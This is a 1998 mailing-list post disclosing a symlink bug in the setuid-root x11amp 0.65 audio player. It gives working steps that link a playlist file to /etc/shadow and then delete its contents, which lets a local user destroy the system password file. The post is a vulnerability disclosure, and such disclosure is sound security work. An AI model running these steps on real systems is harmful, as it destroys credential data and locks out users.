x11amp playlist bug

From: viinikala (kalaat_private)
Date: Sat Feb 28 1998 - 08:32:21 PST

  • Next message: Ari Heitner: "Re: x11amp playlist bug"

    x11 audio mpeg player (x11amp) version 0.65, when installed setuid root
    (as suggested by the README file), creates playlist files in ~/.x11amp
    while making 'root' the owner of these plaintext files (instead of the
    proper user). unfortunatelly, the program DOES follow symlinks, and
    overwriting for instance /etc/shadow is therefore trivial:
    mkdir ~/.x11amp
    ln -s /etc/shadow ~/.x11amp/ekl
    now run x11amp, get into the playlist menu, select 'ekl', mark all the
    entries and hit 'delete'. no matter if the prg crashes (it might),
    /etc/shadow is gone, anyway.
    viinikala/rvl&grif <kalaat_private>
    i could wrap you up in cotton wool.

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